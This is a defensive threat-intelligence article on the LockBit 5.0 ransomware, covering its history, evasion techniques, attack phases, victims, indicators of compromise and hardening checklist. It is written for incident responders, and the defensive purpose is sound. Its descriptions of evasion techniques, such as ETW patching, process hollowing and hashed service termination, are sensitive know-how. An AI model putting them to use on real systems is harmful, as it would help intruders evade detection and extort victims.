LockBit 5.0 Ransomware: Technical Analysis, TTPs, and Defensive Guidance
LockBit 5.0 is the latest iteration of one of the most active ransomware operations on record. Released in September 2025, it arrived less than two years after a coordinated international law enforcement action, Operation Cronos, that dismantled significant portions of the Lockbit group's infrastructure. The speed of that recovery, and the technical maturity of the new version, make LockBit 5.0 a credible and current threat to enterprises across nearly every sector.
This article provides a standalone technical and operational reference for incident response teams, MSPs, and security decision-makers. It covers the variant's capabilities, attack lifecycle, victimology, indicators of compromise, and a checklist of defensive controls directly tied to observed behavior.
LockBit ransomware history and evolution
LockBit first appeared in 2019 under the name ABCD, a reference to the .abcd extension the early variant appended to every file it encrypted. Over the following years it developed into one of the most active ransomware-as-a-service (RaaS) operations globally, releasing successive versions: LockBit 2.0 in 2021, which introduced StealBit for automated data theft, and LockBit 3.0, also known as LockBit Black, in 2022. At its peak, the group was responsible for a substantial share of global ransomware incidents.
In February 2024, Operation Cronos, a coordinated international law enforcement effort involving agencies across multiple countries, seized the group's infrastructure, exposed affiliates, and released decryption keys for victims. The disruption was significant but not permanent.
By early 2025, LockBit 4.0 had been released. In September 2025, LockBit 5.0, also known as "ChuongDong", followed, activity continuing into the current period. The pattern reflects a deliberate operational posture: rebuild infrastructure, improve tooling, and resume operations with enhanced capability.
LockBit 5.0 is a technically evolved platform that incorporates cross-platform support, improved defense evasion, and faster encryption.
Technical capabilities
LockBit 5.0 introduces several technical improvements over its predecessors that expand both its reach and its ability to evade detection. The variant is more modular than prior versions, with separate builds optimized for different operating environments, and incorporates stronger anti-analysis techniques that complicate forensic investigation and endpoint detection.
Cross-platform targeting
LockBit 5.0 can simultaneously disrupt Windows workstations, Linux servers, and virtualized infrastructure, while leaving fewer artifacts to reconstruct afterward. The group has also advertised compatibility with Proxmox, an open-source virtualization platform increasingly adopted by enterprises as an alternative to commercial hypervisors. This cross-platform reach allows affiliates to deploy a single campaign that impacts endpoints, servers, and virtual infrastructure simultaneously, maximizing disruption across an environment.
The Windows sample is the most technically complex of the three variants. The Linux and ESXi builds are structurally similar, with ESXi including functions specifically targeted at virtualization environments.
Encryption and defense evasion
All LockBit 5.0 variants use a combination of XChaCha20 and Curve25519 for encryption, appending a randomized extension to each encrypted file. The ransom note format is consistent across all platforms.
The Windows sample applies multiple layers of defense evasion:
- Packing and DLL unhooking to bypass security monitoring at the process level.
- Process hollowing to execute malicious code within legitimate processes.
- ETW patching, which disables Event Tracing for Windows functions to suppress telemetry capture. Specifically, it overwrites the EtwEventWrite API with a return instruction, effectively blinding endpoint telemetry at the kernel level.
- Full log clearing to remove forensic artifacts after execution.
- DLL reflection for in-memory payload loading without writing to disk.
The malware terminates security-related services by comparing hashed service names against a hardcoded list of 63 values before encryption begins, systematically dismantling backup solutions, virtualization platforms, and critical business databases rather than performing generic process kills.
The Linux and ESXi variants are not packed, but nearly all strings within the binaries are encrypted, complicating static analysis and signature-based detection.
Infrastructure associated with the LockBit 5.0 data leak site has shown historical ties to SmokeLoader, a commodity malware loader, indicating possible infrastructure reuse or cooperative relationships with other threat actors.
RaaS model and affiliate structure
LockBit 5.0 continues operating as a ransomware-as-a-service cartel. Affiliates receive access to a custom payload builder, data leak site infrastructure, and negotiation support. The group manages its reputation actively and has established structured negotiation processes consistent with a business-like operational model.
Notably, the affiliate program explicitly permits attacks against critical infrastructure and medical facilities, placing legal responsibility on affiliates rather than the core operators. Attacks against organizations in the post-Soviet region are prohibited under affiliate terms, a restriction that has remained consistent across prior versions.
Attack lifecycle
LockBit 5.0 intrusions follow a structured, multi-phase progression from initial access to extortion. Each phase builds on the last, and the window for detection narrows considerably as the operation advances.
Understanding how affiliates move through these stages is essential for prioritizing controls and identifying where intervention is most likely to succeed.
Phase 1: Initial access
Phishing and vulnerability exploitation are the two dominant initial access vectors across extortion incidents, each accounting for approximately 22% of cases according to the Unit 42 incident response report from 2026.
LockBit 5.0 affiliates exploit all three routes:
- Phishing campaigns have become more effective as AI-assisted tooling enables more credible, targeted lures.
- Vulnerability exploitation concentrates on widely deployed internet-facing systems where the effort required to weaponize a weakness is low relative to the access gained.
- Previously compromised credentials, obtained from prior breaches or underground markets, allow affiliates to authenticate directly into VPNs, remote access gateways, and cloud portals without triggering early detection.
Phase 2: Execution and persistence
Following initial access, affiliates establish persistence through PowerShell-based execution, scheduled tasks, and registry modifications. Living-off-the-land binaries (LOLBins), legitimate system tools repurposed for malicious use, are used extensively to blend activity into normal operational traffic. Remote monitoring and management (RMM) tools are also observed in deployment across ransomware operations consistent with LockBit affiliate tradecraft.
Phase 3: Lateral movement and privilege escalation
Lateral movement proceeds via Server Message Block (SMB) and Remote Desktop Protocol (RDP) propagation, credential dumping, and token or session hijacking.
Identity weaknesses, including excessive permissions, over-scoped service accounts, and unretired legacy roles, consistently accelerate this phase.
In Unit 42 investigations, identity issues played a material role in nearly 90% of cases, turning an initial foothold into broad network access.
Phase 4: Data exfiltration
Pre-encryption data exfiltration is standard practice. Data theft featured in more than half of all extortion cases observed in 2025. Files are staged and transferred via cloud storage services, FTP/SFTP, or custom exfiltration channels. Web service exfiltration (MITRE T1567) is the most prevalent observed technique.
The pace of this phase is accelerating. In 2025, the fastest quartile of intrusions reached exfiltration in approximately 72 minutes, a sharp reduction from roughly 285 minutes the prior year. Defenders cannot assume a multi-hour window for detection and intervention.
Phase 5: Encryption and extortion
After exfiltration, the ransomware payload deploys across all reachable systems. LockBit 5.0 uses double extortion: file encryption combined with the threat of leak site publication.
In 2025, encryption appeared in 78% of extortion cases, down from prior years, reflecting a broader shift toward data exposure as a standalone lever. Reporting indicates that some intrusions proceeded to extortion without file locking, relying entirely on the threat of data release to generate pressure.
Harassment tactics, including direct contact with employees or customers, are also observed in a subset of cases.
Targeting and victimology
LockBit 5.0 has recorded over 200 victims on its data leak site since December 2025, with activity continuing into early 2026. The primary target base is the U.S. private business sector, with the U.S., India, and Brazil identified as the principal geographic targets. The operation maintains a broader global footprint, with significant victim representation in Europe as well.
Industry distribution reflects the broader LockBit targeting pattern: healthcare, manufacturing, financial services, government agencies, and educational institutions are all represented.
The Health-ISAC has specifically flagged LockBit as among the most dangerous ransomware threats currently active against healthcare organizations. Healthcare environments face particularly acute risk given the combination of sensitive data, operational criticality, and historically uneven security controls.
Geographic and sector restrictions applied by the affiliate program shape targeting at the margins, but the practical effect remains a broadly opportunistic operation concentrated on organizations with identifiable weaknesses in identity controls, patch management, or endpoint visibility.
Indicators of compromise
The following IOC categories are consistent with LockBit 5.0 activity. Specific file hashes and IP addresses vary per campaign due to the affiliate customization model.
| IOC category | Details |
|---|---|
| Encrypted file extension | Random extension appended to all encrypted files |
| Ransom note filename | ReadMeForDecrypt.txt, dropped across directories post-encryption |
| Ransom note | Consistent format across platforms; dropped across multiple directories |
| File extension pattern | Randomized 16-character hexadecimal string (e.g., .[a-f0-9]{16}) |
| PowerShell activity | Unusual execution chains; obfuscated scripts deployed at scale |
| RMM tool misuse | Unauthorized deployment or lateral use of remote management tools |
| ESXi admin commands | Unauthorized virtualization administration activity (T1675) |
| Outbound data spikes | Large transfers via web services prior to encryption (T1567) |
| C2 infrastructure | Tor-hosted onion domains; infrastructure with historical SmokeLoader associations |
| Log and ETW tampering | Cleared Windows event logs; disabled ETW functions post-execution |
Known file hashes (SHA-256)
Windows variants:
- 7ea5afbc166c4e23498aa9747be81ceaf8dad90b8daa07a6e4644dc7c2277b82
- 180e93a091f8ab584a827da92c560c78f468c45f2539f73ab2deb308fb837b38
Linux variants:
- 4dc06ecee904b9165fa699b026045c1b6408cc7061df3d2a7bc2b7b4f0879f4d
- 90b06f07eb75045ea3d4ba6577afc9b58078eafeb2cdd417e2a88d7ccf0c0273
- 98d8c7870c8e99ca6c8c25bb9ef79f71c25912fbb65698a9a6f22709b8ad34b6
Security teams should treat unusual ESXi administrative commands and large pre-encryption outbound transfers as high-priority escalation signals, given LockBit 5.0's explicit cross-platform targeting and standard exfiltration-first workflow.
Security checklist
The following controls map directly to LockBit 5.0's observed attack patterns. Each item addresses a specific phase or technique documented in this analysis.
- Deploy phishing-resistant MFA (FIDO2/passkeys) for all privileged accounts. Standard MFA is increasingly bypassed through adversary-in-the-middle and session hijacking techniques consistent with LockBit affiliate tradecraft.
- Audit and enforce least privilege across human and machine identities. Retire over-scoped roles, unmonitored service accounts, and legacy permissions: these are the pathways through which a foothold becomes a breach.
- Automate patching for internet-facing assets, targeting critical CVEs within 24 hours of disclosure. Evidence suggests attackers begin scanning for newly disclosed vulnerabilities within minutes of a CVE being announced.
- Isolate backups from production networks and test restoration regularly. In 26% of 2025 extortion cases, attackers targeted backup infrastructure. Isolated, tested backups are the primary recovery path that does not require negotiation.
- Monitor ESXi, Proxmox, and virtualization platforms for unauthorized administrative commands. LockBit 5.0 explicitly supports these environments, and affiliates deploy tooling specifically designed to exploit them.
- Deploy EDR/XDR with behavioral analytics capable of detecting process hollowing, DLL unhooking, and ETW patching, all techniques the Windows variant applies during execution.
- Alert on outbound data transfer anomalies before and independent of encryption. Data theft can generate extortion leverage without any encryption occurring.
Understanding how to respond when an incident occurs, including isolation procedures, stakeholder notification, and evidence preservation, is as important as prevention.
Digital forensics investigation following a ransomware incident can establish the full scope of access, support insurance claims, and provide the evidence base for legal proceedings. Foundational security controls that close the gaps LockBit affiliates routinely exploit should be validated and documented before an incident, not after.
Approved by
Bogdan founded Proven Data in 2011 with a mission to help organizations recover from data loss and cyber incidents. Under his leadership, the company has grown from a data recovery lab into a nationally recognized cybersecurity firm handling thousands of incident response cases.
